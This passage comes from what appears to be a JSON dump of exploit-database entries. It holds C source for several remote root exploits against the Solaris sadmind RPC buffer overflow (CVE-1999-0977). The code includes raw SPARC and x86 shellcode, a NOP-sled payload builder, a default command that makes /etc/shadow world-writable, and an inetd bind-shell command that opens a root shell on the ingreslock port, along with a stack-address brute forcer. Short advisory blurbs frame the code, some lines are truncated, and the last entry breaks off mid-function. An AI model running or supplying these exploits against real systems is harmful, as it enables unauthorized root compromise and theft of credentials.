*xdrs, struct nm_send_arg_string *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string2))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n if 
(!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n if (!xdr_nm_send_header(xdrs, &objp->header))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_int(xdrs, &objp->version))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_footer(xdrs, &objp->footer))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_reply(XDR *xdrs, struct nm_reply *objp)\r\n{\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n CLIENT *cl;\r\n struct nm_send send;\r\n struct nm_reply reply;\r\n struct timeval tm;\r\n enum clnt_stat stat;\r\n int c, i, len, slen, clen;\r\n char *program, *cp, buf[BUFLEN+1];\r\n char *hostname, *command;\r\n int offset, alignment, pinging = 0;\r\n unsigned long int sp = 0, fp, addr;\r\n\r\n program = argv[0];\r\n hostname = \"localhost\";\r\n command = \"chmod 666 /etc/shadow\";\r\n offset = OFFSET; alignment = ALIGNMENT;\r\n while ((c = getopt(argc, argv, \"h:c:s:o:a:p\")) != EOF) {\r\n\tswitch (c) {\r\n\tcase 'h':\r\n\t hostname = optarg;\r\n\t break;\r\n\tcase 'c':\r\n\t command = optarg; \r\n\t break;\r\n\tcase 's':\r\n\t sp = strtoul(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'o':\r\n\t offset = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'a':\r\n\t alignment = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'p':\r\n\t pinging = 1;\r\n\t break;\r\n\tdefault:\r\n\t fprintf(stderr, \"usage: %s -h hostname -c command -s sp \"\r\n\t\t \"[-o offset] [-a alignment] [-p]\\n\", program);\r\n\t exit(1);\r\n\t break;\r\n\t}\r\n }\r\n memset(buf, '\\xff', BUFLEN);\r\n fp = sp + FRAMELEN1 + 
FRAMELEN2; fp &= 0xfffffff8;\r\n addr = sp + offset; addr &= 0xfffffffc;\r\n for (i = 0, cp = buf + alignment; i < ADDRLEN / 8; i++) {\r\n\t*cp++ = (fp >> 24) & 0xff;\r\n\t*cp++ = (fp >> 16) & 0xff;\r\n\t*cp++ = (fp >> 8) & 0xff;\r\n\t*cp++ = (fp >> 0) & 0xff;\r\n\t*cp++ = (addr >> 24) & 0xff;\r\n\t*cp++ = (addr >> 16) & 0xff;\r\n\t*cp++ = (addr >> 8) & 0xff;\r\n\t*cp++ = (addr >> 0) & 0xff;\r\n }\r\n slen = strlen(shell); clen = strlen(command);\r\n len = BUFLEN - 1 - clen - slen - ADDRLEN - alignment; len &= 0xfffffffc;\r\n for (i = 0; i < len / 4; i++) {\r\n\t*cp++ = (NOP >> 24) & 0xff;\r\n\t*cp++ = (NOP >> 16) & 0xff;\r\n\t*cp++ = (NOP >> 8) & 0xff;\r\n\t*cp++ = (NOP >> 0) & 0xff;\r\n }\r\n len = clen; len++; len = -len;\r\n shell[LEN+0] = (len >> 24) & 0xff;\r\n shell[LEN+1] = (len >> 16) & 0xff;\r\n shell[LEN+2] = (len >> 8) & 0xff;\r\n shell[LEN+3] = (len >> 0) & 0xff;\r\n memcpy(cp, shell, slen); cp += slen;\r\n memcpy(cp, command, clen);\r\n buf[BUFLEN] = '\\0';\r\n memset(&send, 0, sizeof(struct nm_send));\r\n send.header.uint2 = NETMGT_HEADER_TYPE;\r\n send.header.string1 = \"\";\r\n send.header.string2 = \"\";\r\n send.header.string3 = \"\";\r\n send.header.uint7 =\r\n\tstrlen(ADM_FW_VERSION) + 1 +\r\n\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\tstrlen(ADM_CLIENT_DOMAIN) + 1 +\r\n\t(4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n\tstrlen(ADM_FENCE) + 1 +\r\n\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\tstrlen(NETMGT_ENDOFARGS) + 1;\r\n send.version.string1 = ADM_FW_VERSION;\r\n send.version.uint1 = NETMGT_ARG_INT;\r\n send.version.uint2 = sizeof(int);\r\n send.version.int1 = 1;\r\n send.string.string1 = ADM_CLIENT_DOMAIN;\r\n send.string.uint1 = NETMGT_ARG_STRING;\r\n send.string.uint2 = strlen(buf);\r\n send.string.string2 = buf;\r\n send.fence.string1 = ADM_FENCE;\r\n send.fence.uint1 = NETMGT_ARG_INT;\r\n send.fence.uint2 = sizeof(int);\r\n send.fence.int1 = 666;\r\n send.footer.string1 = NETMGT_ENDOFARGS;\r\n cl = clnt_create(hostname, 
NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n if (cl == NULL) {\r\n\tclnt_pcreateerror(\"clnt_create\");\r\n\texit(1);\r\n }\r\n cl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n if (!pinging) {\r\n\tfprintf(stdout,\r\n\t\t\"%%sp 0x%08lx offset %d --> return address 0x%08lx [%d]\\n\",\r\n\t\tsp, offset, addr, alignment);\r\n\tfprintf(stdout,\r\n\t\t\"%%sp 0x%08lx with frame length %d --> %%fp 0x%08lx\\n\",\r\n\t\tsp, FRAMELEN1 + FRAMELEN2, fp);\r\n\ttm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\ttm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\tstat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n\t\t\t xdr_nm_send, (caddr_t) &send,\r\n\t\t\t xdr_nm_reply, (caddr_t) &reply, tm);\r\n\tif (stat != RPC_SUCCESS) {\r\n\t clnt_perror(cl, \"clnt_call\");\r\n\t fprintf(stdout, \"now check if exploit worked; \"\r\n\t\t \"RPC failure was expected\\n\");\r\n\t exit(0);\r\n\t}\r\n\tfprintf(stderr, \"exploit failed; \"\r\n\t\t\"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n\t\treply.uint1, reply.uint2, reply.string1);\r\n\tclnt_destroy(cl);\r\n\texit(1);\r\n } else {\r\n\ttm.tv_sec = NETMGT_UDP_PING_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\ttm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\tstat = clnt_call(cl, NETMGT_PROC_PING,\r\n\t\t\t xdr_void, NULL,\r\n\t\t\t xdr_void, NULL, tm);\r\n\tif (stat != RPC_SUCCESS) {\r\n\t 
clnt_perror(cl, \"clnt_call\");\r\n\t exit(1);\r\n\t}\r\n\tclnt_destroy(cl);\r\n\texit(0);\r\n }\r\n}\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19668/"}, {"lastseen": "2016-02-02T12:24:55", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (3). CVE-1999-0977. Remote exploit for solaris platform", "published": "2000-11-10T00:00:00", "type": "exploitdb", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "2000-11-10T00:00:00", "id": "EDB-ID:19670", "href": "https://www.exploit-db.com/exploits/19670/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n \r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n \r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in questions appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root any code launched as a result will run as with root privileges, therefore resulting in a root compromise. 
\r\n\r\n// *** Synnergy Networks\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n\r\n/* *** ATTENTION *** you may have to change some\r\nof these *** ATTENTION *** */\r\n#define EXPX86 \"sadmindex-x86\" /*\r\nsadmind exploit for x86 arch */\r\n#define EXPSPARC \"sadmindex-sparc\" /*\r\nsadmind exploit for sparc arch */\r\n#define INC 4 /* sp brute forcing\r\nincrementation - 4 should be ok\r\n\r\n/* DON'T change the following */\r\n#define FALSE 0 /* false */\r\n#define TRUE !FALSE /* true */\r\n#define BINDINGRES \"echo 'ingreslock stream\r\ntcp nowait root /bin/sh sh -i'\r\n > /tmp/.x;\r\n/usr/sbin/inetd -s /tmp/.x;\r\n m -f\r\n/tmp/.x;\" /* bind rootshell */\r\n#define SPX8626 0x080418ec /* default\r\nsadmindex sp for x86 2.6 */\r\n#define SPX867 0x08041798 /* default\r\nsadmindex sp for x86 7.0 */\r\n#define SPSPARC26 0xefff9580 /* default\r\nsadmindex sp for sparc 2.6 */\r\n#define SPSPARC7 0xefff9418 /* default\r\nsadmindex sp for sparc 7.0 */\r\n#define EXPCMDX8626 \"./%s -h %s -c \\\"%s\\\" -s\r\n0x%x -j 512\\n\" /* cmd line */\r\n#define EXPCMDX867 \"./%s -h %s -c \\\"%s\\\" -s\r\n0x%x -j 536\\n\" /* cmd line */\r\n#define EXPCMDSPARC \"./%s -h %s -c \\\"%s\\\" -s\r\n0x%x\\n\" /* cmd line */\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n int i, sockfd, fd, size = 4096, sign = -1;\r\n long int addr;\r\n char *buffer = (char *) malloc (size);\r\n struct hostent *he;\r\n struct sockaddr_in their_addr;\r\n if (argc < 3)\r\n {\r\n fprintf(stderr, \"\\nsadmindex sp\r\nbrute forcer - by elux\\n\");\r\n fprintf(stderr, \"usage: %s [arch]\r\n<host>\\n\\n\", argv[0]);\r\n fprintf(stderr, \"\\tarch:\\n\");\r\n fprintf(stderr, \"\\t1 - x86 Solaris\r\n2.6\\n\");\r\n fprintf(stderr, \"\\t2 - x86 Solaris\r\n7.0\\n\");\r\n 
fprintf(stderr, \"\\t3 - SPARC\r\nSolaris 2.6\\n\");\r\n fprintf(stderr, \"\\t4 - SPARC\r\nSolaris 7.0\\n\\n\");\r\n exit(TRUE);\r\n }\r\n\r\n if ( (he = gethostbyname(argv[2])) ==\r\nNULL)\r\n {\r\n printf(\"Unable to resolve %s\\n\",\r\nargv[2]);\r\n exit(TRUE);\r\n }\r\n\r\n their_addr.sin_family = AF_INET;\r\n their_addr.sin_port = htons(1524);\r\n their_addr.sin_addr = *((struct in_addr\r\n*)he->h_addr);\r\n bzero(&(their_addr.sin_zero), 8);\r\n\r\n if ( (strcmp(argv[1], \"1\")) == 0)\r\n {\r\n addr = SPX8626;\r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n {\r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n \r\nclose(sockfd);\r\n \r\nexit(FALSE);\r\n }\r\n }\r\n if ( (fd = open(EXPX86,\r\nO_RDONLY)) != -1)\r\n {\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDX8626, EXPX86, arg\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n }\r\n else if ( (strcmp(argv[1], \"2\")) == 0)\r\n {\r\n addr = SPX867;\r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n {\r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n \r\nclose(sockfd);\r\n \r\nexit(FALSE);\r\n }\r\n }\r\n if ( (fd = open(EXPX86,\r\nO_RDONLY)) != -1)\r\n {\r\n\r\n\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDX867, EXPX86, argv\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n }\r\n else if ( (strcmp(argv[1], \"3\")) == 0)\r\n {\r\n addr = SPSPARC26;\r\n printf(\"\\nAlright... 
sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n {\r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n close(sockfd);\r\n \r\nexit(FALSE);\r\n }\r\n }\r\n if ( (fd = open(EXPSPARC,\r\nO_RDONLY)) != -1)\r\n {\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDSPARC, EXPSPARC, a\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n }\r\n else if ( (strcmp(argv[1], \"4\")) == 0)\r\n {\r\n addr = SPSPARC7; \r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n { \r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n \r\nclose(sockfd);\r\n \r\nexit(FALSE);\r\n } \r\n }\r\n if ( (fd = open(EXPSPARC,\r\nO_RDONLY)) != -1)\r\n {\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDSPARC, EXPSPARC, a\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n\r\n }\r\n else\r\n printf(\"%s is not a supported\r\narch, try 1 - 4 ... .. .\\n\", argv\r\n}\r\n\r\n// EOF\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19670/"}, {"lastseen": "2016-02-02T12:25:09", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (4). CVE-1999-0977. 
Remote exploit for solaris platform", "published": "1999-12-10T00:00:00", "type": "exploitdb", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 4", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "1999-12-10T00:00:00", "id": "EDB-ID:19672", "href": "https://www.exploit-db.com/exploits/19672/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n \r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n \r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in questions appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root any code launched as a result will run as with root privileges, therefore resulting in a root compromise. \r\n\r\n/*************************************************************************\\\r\n** **\r\n** Super Solaris sadmin Exploit - Based on sadminex by Cheez Whiz **\r\n** by optyx <optyx@uberhax0r.net> **\r\n** based on sadminsparc. 
and sadminx86.c by Cheez Whiz **\r\n** **\r\n\\*************************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\nchar shellsparc[] = \"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\"\r\n\t\t \"\\x90\\x03\\xe0\\x5c\\x92\\x22\\x20\\x10\\x94\\x1b\\xc0\\x0f\"\r\n\t\t \"\\xec\\x02\\x3f\\xf0\\xac\\x22\\x80\\x16\\xae\\x02\\x60\\x10\"\r\n\t\t \"\\xee\\x22\\x3f\\xf0\\xae\\x05\\xe0\\x08\\xc0\\x2d\\xff\\xff\"\r\n\t\t \"\\xee\\x22\\x3f\\xf4\\xae\\x05\\xe0\\x03\\xc0\\x2d\\xff\\xff\"\r\n\t\t \"\\xee\\x22\\x3f\\xf8\\xae\\x05\\xc0\\x16\\xc0\\x2d\\xff\\xff\"\r\n\t\t \"\\xc0\\x22\\x3f\\xfc\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\"\r\n\t\t \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\t\t \"\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"\r\n\t\t \"\\x2d\\x63\\xff\";\r\n\r\nchar shellx86[] = \"\\xeb\\x45\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\"\r\n\t\t \"\\xc0\\x89\\x46\\xb7\\x88\\x46\\xbc\\x31\\xc0\\x50\\x56\\x8b\"\r\n\t\t \"\\x1e\\xf7\\xdb\\x89\\xf7\\x83\\xc7\\x10\\x57\\x89\\x3e\\x83\"\r\n\t\t \"\\xc7\\x08\\x88\\x47\\xff\\x89\\x7e\\x04\\x83\\xc7\\x03\\x88\"\r\n\t\t \"\\x47\\xff\\x89\\x7e\\x08\\x01\\xdf\\x88\\x47\\xff\\x89\\x46\"\r\n\t\t \"\\x0c\\xb0\\x3b\\xe8\\xbe\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\"\r\n\t\t \"\\xbe\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\t\t \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\"\r\n\t\t \"\\x2f\\x73\\x68\\xff\\x2d\\x63\\xff\";\r\n\t\t \r\n\r\nint buflen[]\t = { 1076, 1056 };\r\nint addrlen[] \t = { 560, 8 };\r\nint lens[]\t = { 84, 76 };\r\nint offset[]\t = { 688, 572 };\r\nint alignment[]\t = { 4, 0 };\r\nlong int nops[]\t = { 0x801bc00f, 0x90 };\r\nint junks[]\t = { 512, 536 };\r\nchar command[] \t = \"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \"\r\n\t \"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f 
/tmp/.x;\";\r\nunsigned long int sp[]\t= { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };\r\n \r\n#define FRAMELEN1 608\r\n#define FRAMELEN2 4200\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define FW_VERSION \"VERSION\"\r\n#define CLIENT_DOMAIN \"CLIENT_DOMAIN\"\r\n#define FENCE \"FENCE\"\r\n\r\nstruct nm_send_header {\r\n\tstruct timeval timeval1;\r\n\tstruct timeval timeval2;\r\n\tstruct timeval timeval3;\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tunsigned int uint3;\r\n\tunsigned int uint4;\r\n\tunsigned int uint5;\r\n\tstruct in_addr inaddr1;\r\n\tstruct in_addr inaddr2;\r\n\tunsigned long ulong1;\r\n\tunsigned long ulong2;\r\n\tstruct in_addr inaddr3;\r\n\tunsigned long ulong3;\r\n\tunsigned long ulong4;\r\n\tunsigned long ulong5;\r\n\tstruct timeval timeval4;\r\n\tunsigned int uint6;\r\n\tstruct timeval timeval5;\r\n\tchar *string1;\r\n\tchar *string2;\r\n\tchar *string3;\r\n\tunsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n\tchar *string1;\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tint int1;\r\n\tunsigned int uint3;\r\n\tunsigned int uint4;\r\n};\r\n\r\nstruct nm_send_arg_string {\r\n\tchar *string1;\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tchar *string2;\r\n\tunsigned int uint3;\r\n\tunsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n\tchar *string1;\r\n};\r\n\r\nstruct nm_send {\r\n\tstruct nm_send_header header;\r\n\tstruct nm_send_arg_int version;\r\n\tstruct nm_send_arg_string string;\r\n\tstruct nm_send_arg_int fence;\r\n\tstruct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n\tunsigned 
int uint1;\r\n\tunsigned int uint2;\r\n\tchar *string1;\r\n};\r\n\r\nbool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n\tchar *addr;\r\n\tsize_t size = sizeof(struct in_addr);\r\n\r\n\tif(!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint4))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint5))\r\n\t\treturn (FALSE);\r\n\taddr = (char *) &objp->inaddr1.s_addr;\r\n\tif(!xdr_bytes(xdrs, &addr, &size, size))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong4))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong5))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint6))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval5.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, 
&objp->uint7))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_int(xdrs, &objp->int1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint4))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)\r\n{\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint4))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n\tif(!xdr_nm_send_header(xdrs, &objp->header))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_arg_int(xdrs, &objp->version))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_footer(xdrs, &objp->footer))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)\r\n{\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nvoid usage(char 
